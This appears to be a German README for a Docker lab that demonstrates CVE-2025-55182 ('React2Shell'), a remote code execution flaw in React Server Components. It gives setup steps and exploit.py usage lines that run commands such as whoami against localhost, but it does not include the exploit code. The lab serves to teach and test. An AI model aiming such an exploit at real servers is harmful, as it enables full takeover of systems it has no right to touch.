
Ein praxisorientiertes Labor zum Verständnis und zur Ausnutzung von CVE-2025-55182 (React2Shell) - Remote Code Execution in React Server Components
Ein praktisches Labor zur Ausnutzung von CVE-2025-55182 (React2Shell) - Remote-Codeausführung in React-Serverkomponenten.
Nur zu Bildungszwecken. Teste nur auf Systemen, die dir gehören.
# Clone and start
git clone https://github.com/dhananjayakumarn/CVE-2025-55182-Lab.git
cd CVE-2025-55182-Lab
docker-compose up -d
# Wait 20 seconds, then exploit
python3 exploit.py http://localhost:3000 "whoami"
Das war's! Du solltest eine Befehlsausgabe sehen, die die RCE belegt.
Kritische RCE-Schwachstelle in React Server Components (CVSS 10.0).
Betroffen:
Auswirkung: Eine HTTP-Anfrage = vollständige Serverkontrolle
python3 exploit.py <target> <command>
# Examples
python3 exploit.py http://localhost:3000 "whoami"
python3 exploit.py http://localhost:3000 "id"
python3 exploit.py http://localhost:3000 "ls -la"
docker-compose down
⭐ Gib einen Stern, wenn dir das geholfen hat!